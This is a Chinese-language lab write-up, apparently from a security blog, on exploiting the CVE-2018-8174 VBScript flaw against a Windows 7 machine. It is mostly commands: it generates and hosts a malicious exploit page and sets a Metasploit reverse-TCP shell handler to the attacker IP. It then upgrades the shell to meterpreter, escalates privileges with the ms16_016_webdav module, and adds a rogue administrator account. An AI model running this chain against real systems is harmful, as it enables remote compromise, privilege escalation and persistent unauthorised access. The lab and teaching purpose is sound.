-->
当前位置:首页 > 实验 > 正文内容

实验目的

  • 通过获取普通用户shell进行提权管理权限

Luz3年前 (2020-12-11)实验3044

实验目的

  • 通过获取普通用户shell进行提权管理权限

实验原理

* Microsoft Windows 7等都是美国微软(Microsoft)公司发布的一系列操作系统。Windows VBScript engine是其中的一个VBScript(脚本语言)引擎。Microsoft Windows VBScript引擎中存在远程代码执行漏洞。远程攻击者可利用该漏洞在当前用户的上下文中执行任意代码,造成内存损坏

实验环境

1.操作系统

  操作机:kali
  用户:root
  密码:123456
  目标机:win7

实验步骤

步骤1:使用poc获取shell

1.1.进入目录,使用python编译文件,此处-i为攻击机ip

python CVE-2018-8174.py -u http://10.143.0.14/exploit.html -o msf.rtf -i 10.143.0.14 -p 4444

 

图1

  1.2.复制文件,重启web服务

cp exploit.html /var/www/html

service apache2 restart

 

图2

  1.3.切换到操作机,进入控制面板创建新的用户并切换到新的用户(目的为获取到普通用户的shell后面进行提权)

 

图3

 

 

图4

  1.4.切换到操作机使用metasploit获取目标机shell

msfconsole

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST 10.143.0.14

exploit

 

图5

  1.6.目标机win7使用IE浏览器访问10.143.0.14/exploit.html,在IE中打开恶意链接后,虽然页面显示打开失败,但是实际攻击已经成功,kali机获得返回的shell。

 

图6

  1.6.打开返回的shell,输入chcp 65001 清除乱码

 

图7

 

步骤2:shell升级

 2.1.尝试添加新用户发现指令被拒绝,说明当前用户权限太低。

net user hy 123456 /add

 

图8

  2.2.将shell转到后台,注意这里是session 2

ctrl +z

y

sessions -l

 

图9

  2.3.载入转换模块开始攻击

use post/multi/manage/shell_to_meterpreter

set SESSION 2

run

 

图10

  2.4.查看是否出现新SESSION并进入,并查看权限

sessions -l

sessions -i 3

getsystem

 

图11

步骤3:漏洞提权

3.1.使用background将sessions3放到后台,配合其他漏洞进行提权

background

use exploit/windows/local/ms16_016_webdav

set SESSION 3

exploit

exploit

 

图12

  3.3.,查看uid

getuid

 

图13

  3.4.输入shell,添加新用户并赋予管理员权限

shell

net user hy 123 /add

net localgroup administrators hy /add

 

图14

  3.5.切换到目标机查看是否添加成功

 

图15

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。